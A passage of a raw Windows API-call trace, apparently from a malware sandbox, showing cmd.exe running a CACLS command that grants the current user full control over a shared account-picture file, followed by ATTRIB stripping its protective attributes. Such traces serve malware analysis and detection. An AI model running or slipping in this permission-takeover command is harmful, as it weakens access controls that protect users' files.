lpAddress=0xb3000, lpBuffer=0x1afbec, dwLength=0x1c | out: lpBuffer=0x1afbec*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0184.418] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1afbec, dwLength=0x1c | out: lpBuffer=0x1afbec*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0184.418] GetConsoleOutputCP () returned 0x1b5 [0184.418] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0184.418] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0184.418] _get_osfhandle (_FileHandle=1) returned 0x7 [0184.418] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0184.418] _get_osfhandle (_FileHandle=1) returned 0x7 [0184.418] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0184.418] _get_osfhandle (_FileHandle=1) returned 0x7 [0184.418] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0184.418] _get_osfhandle (_FileHandle=0) returned 0x3 [0184.418] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0184.419] _get_osfhandle (_FileHandle=0) returned 0x3 [0184.419] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0184.419] GetEnvironmentStringsW () returned 0x2d0308* [0184.419] FreeEnvironmentStringsW (penv=0x2d0308) returned 1 [0184.419] GetEnvironmentStringsW () returned 0x2d0308* [0184.419] FreeEnvironmentStringsW (penv=0x2d0308) returned 1 [0184.419] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aeb8c | out: phkResult=0x1aeb8c*=0x40) returned 0x0 [0184.419] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aeb94, lpData=0x1aeb98, lpcbData=0x1aeb90*=0x1000 | out: lpType=0x1aeb94*=0x0, lpData=0x1aeb98*=0xb8, lpcbData=0x1aeb90*=0x1000) returned 0x2 [0184.419] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aeb94, lpData=0x1aeb98, lpcbData=0x1aeb90*=0x1000 | out: lpType=0x1aeb94*=0x4, lpData=0x1aeb98*=0x1, lpcbData=0x1aeb90*=0x4) returned 0x0 [0184.419] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aeb94, lpData=0x1aeb98, lpcbData=0x1aeb90*=0x1000 | out: lpType=0x1aeb94*=0x0, lpData=0x1aeb98*=0x1, lpcbData=0x1aeb90*=0x1000) returned 0x2 [0184.419] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aeb94, lpData=0x1aeb98, lpcbData=0x1aeb90*=0x1000 | out: lpType=0x1aeb94*=0x4, lpData=0x1aeb98*=0x0, lpcbData=0x1aeb90*=0x4) returned 0x0 [0184.419] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aeb94, lpData=0x1aeb98, lpcbData=0x1aeb90*=0x1000 | out: lpType=0x1aeb94*=0x4, lpData=0x1aeb98*=0x40, lpcbData=0x1aeb90*=0x4) returned 0x0 [0184.420] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aeb94, lpData=0x1aeb98, lpcbData=0x1aeb90*=0x1000 | out: lpType=0x1aeb94*=0x4, lpData=0x1aeb98*=0x40, lpcbData=0x1aeb90*=0x4) returned 0x0 [0184.420] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aeb94, lpData=0x1aeb98, lpcbData=0x1aeb90*=0x1000 | out: lpType=0x1aeb94*=0x0, lpData=0x1aeb98*=0x40, lpcbData=0x1aeb90*=0x1000) returned 0x2 [0184.420] RegCloseKey (hKey=0x40) returned 0x0 [0184.420] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aeb8c | out: phkResult=0x1aeb8c*=0x40) returned 0x0 [0184.420] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aeb94, lpData=0x1aeb98, lpcbData=0x1aeb90*=0x1000 | out: lpType=0x1aeb94*=0x0, lpData=0x1aeb98*=0x40, lpcbData=0x1aeb90*=0x1000) returned 0x2 [0184.420] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aeb94, lpData=0x1aeb98, lpcbData=0x1aeb90*=0x1000 | out: lpType=0x1aeb94*=0x4, lpData=0x1aeb98*=0x1, lpcbData=0x1aeb90*=0x4) returned 0x0 [0184.420] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aeb94, lpData=0x1aeb98, lpcbData=0x1aeb90*=0x1000 | out: lpType=0x1aeb94*=0x0, lpData=0x1aeb98*=0x1, lpcbData=0x1aeb90*=0x1000) returned 0x2 [0184.420] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aeb94, lpData=0x1aeb98, lpcbData=0x1aeb90*=0x1000 | out: lpType=0x1aeb94*=0x4, lpData=0x1aeb98*=0x0, lpcbData=0x1aeb90*=0x4) returned 0x0 [0184.420] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aeb94, lpData=0x1aeb98, lpcbData=0x1aeb90*=0x1000 | out: lpType=0x1aeb94*=0x4, lpData=0x1aeb98*=0x9, lpcbData=0x1aeb90*=0x4) returned 0x0 [0184.420] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aeb94, lpData=0x1aeb98, lpcbData=0x1aeb90*=0x1000 | out: lpType=0x1aeb94*=0x4, lpData=0x1aeb98*=0x9, lpcbData=0x1aeb90*=0x4) returned 0x0 [0184.420] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aeb94, lpData=0x1aeb98, lpcbData=0x1aeb90*=0x1000 | out: lpType=0x1aeb94*=0x0, lpData=0x1aeb98*=0x9, lpcbData=0x1aeb90*=0x1000) returned 0x2 [0184.420] RegCloseKey (hKey=0x40) returned 0x0 [0184.420] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886392 [0184.420] srand (_Seed=0x5b886392) [0184.420] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp\"" [0184.420] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp\"" [0184.420] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0184.421] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2d1a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0184.421] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0184.421] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0184.421] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0184.421] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0184.421] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0184.421] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0184.421] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0184.421] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0184.421] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0184.421] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0184.421] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0184.421] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0184.421] GetEnvironmentStringsW () returned 0x2d2458* [0184.421] FreeEnvironmentStringsW (penv=0x2d2458) returned 1 [0184.421] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0184.421] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0184.421] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0184.421] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0184.421] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0184.421] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0184.421] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0184.421] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0184.422] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0184.422] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0184.422] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af958 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0184.422] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1af958, lpFilePart=0x1af954 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af954*="Desktop") returned 0x18 [0184.422] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0184.422] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af6d4 | out: lpFindFileData=0x1af6d4) returned 0x2d0ae8 [0184.422] FindClose (in: hFindFile=0x2d0ae8 | out: hFindFile=0x2d0ae8) returned 1 [0184.422] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af6d4 | out: lpFindFileData=0x1af6d4) returned 0x2d0ae8 [0184.422] FindClose (in: hFindFile=0x2d0ae8 | out: hFindFile=0x2d0ae8) returned 1 [0184.422] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af6d4 | out: lpFindFileData=0x1af6d4) returned 0x2d0ae8 [0184.422] FindClose (in: hFindFile=0x2d0ae8 | out: hFindFile=0x2d0ae8) returned 1 [0184.422] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0184.423] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0184.423] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0184.423] GetEnvironmentStringsW () returned 0x2d0308* [0184.423] FreeEnvironmentStringsW (penv=0x2d0308) returned 1 [0184.423] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0184.423] GetConsoleOutputCP () returned 0x1b5 [0184.423] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0184.423] GetUserDefaultLCID () returned 0x409 [0184.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0184.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1afa98, cchData=128 | out: lpLCData="0") returned 2 [0184.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1afa98, cchData=128 | out: lpLCData="0") returned 2 [0184.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1afa98, cchData=128 | out: lpLCData="1") returned 2 [0184.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0184.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0184.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0184.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0184.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0184.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0184.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0184.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0184.424] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0184.424] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0184.424] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0184.425] GetConsoleTitleW (in: lpConsoleTitle=0x2c09b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0184.425] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0184.425] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0184.426] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0184.426] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0184.427] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0184.427] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0184.427] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0184.427] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0184.427] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0184.427] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0184.427] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0184.427] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0184.430] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0184.430] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0184.430] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0184.430] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0184.430] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0184.430] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0184.430] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0184.433] GetConsoleTitleW (in: lpConsoleTitle=0x1af72c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0184.434] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0184.434] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0184.434] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0184.434] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0184.434] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0184.434] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0184.434] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0184.434] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0184.434] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0184.434] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0184.434] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0184.434] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0184.434] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0184.434] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0184.434] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0184.434] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0184.434] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0184.434] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0184.434] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0184.434] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0184.434] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0184.434] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0184.434] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0184.434] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0184.434] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0184.434] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0184.434] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0184.434] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0184.434] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0184.434] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0184.434] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0184.434] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0184.434] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0184.434] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0184.434] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0184.435] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0184.435] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0184.435] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0184.435] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0184.435] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0184.435] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0184.435] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0184.435] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0184.435] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0184.435] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0184.435] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0184.435] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0184.435] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0184.435] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0184.435] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0184.435] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0184.435] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0184.435] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0184.435] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0184.435] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0184.435] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0184.435] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0184.435] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0184.435] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0184.435] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0184.435] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0184.435] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0184.435] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0184.435] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0184.435] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0184.435] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0184.435] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0184.435] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0184.435] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0184.436] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0184.436] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0184.436] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0184.436] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0184.436] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0184.436] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0184.436] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0184.436] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0184.436] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0184.436] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0184.436] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0184.436] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0184.436] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0184.436] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0184.436] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0184.436] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0184.436] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0184.436] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0184.436] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0184.437] SetErrorMode (uMode=0x0) returned 0x0 [0184.437] SetErrorMode (uMode=0x1) returned 0x0 [0184.437] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2d1e98, lpFilePart=0x1af24c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af24c*="Desktop") returned 0x18 [0184.437] SetErrorMode (uMode=0x0) returned 0x1 [0184.437] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0184.437] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0184.442] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0184.443] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x1aefc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aefc8) returned 0xffffffff [0184.443] GetLastError () returned 0x2 [0184.443] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x1aefc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aefc8) returned 0xffffffff [0184.443] GetLastError () returned 0x2 [0184.443] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x1aefc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aefc8) returned 0x2d2180 [0184.444] FindClose (in: hFindFile=0x2d2180 | out: hFindFile=0x2d2180) returned 1 [0184.444] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x1aefc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aefc8) returned 0xffffffff [0184.444] GetLastError () returned 0x2 [0184.444] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x1aefc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aefc8) returned 0x2d2180 [0184.444] FindClose (in: hFindFile=0x2d2180 | out: hFindFile=0x2d2180) returned 1 [0184.444] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0184.444] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0184.444] GetConsoleTitleW (in: lpConsoleTitle=0x1af4c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0184.444] InitializeProcThreadAttributeList (in: lpAttributeList=0x1af348, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1af410 | out: lpAttributeList=0x1af348, lpSize=0x1af410) returned 1 [0184.444] UpdateProcThreadAttribute (in: lpAttributeList=0x1af348, dwFlags=0x0, Attribute=0x60001, lpValue=0x1af408, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1af348, lpPreviousValue=0x0) returned 1 [0184.444] GetStartupInfoW (in: lpStartupInfo=0x1af304 | out: lpStartupInfo=0x1af304*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0184.444] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0184.446] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1af3a4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1af3f0 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x1af3f0*(hProcess=0x50, hThread=0x4c, dwProcessId=0x92c, dwThreadId=0xdb0)) returned 1 [0184.449] CloseHandle (hObject=0x4c) returned 1 [0184.449] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0184.449] GetEnvironmentStringsW () returned 0x2d0308* [0184.449] FreeEnvironmentStringsW (penv=0x2d0308) returned 1 [0184.449] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0184.516] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1af2e4 | out: lpExitCode=0x1af2e4*=0x0) returned 1 [0184.517] CloseHandle (hObject=0x50) returned 1 [0184.519] _vsnwprintf (in: _Buffer=0x1af42c, _BufferCount=0x13, _Format="%08X", _ArgList=0x1af2f0 | out: _Buffer="00000000") returned 8 [0184.519] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0184.519] GetEnvironmentStringsW () returned 0x2d2410* 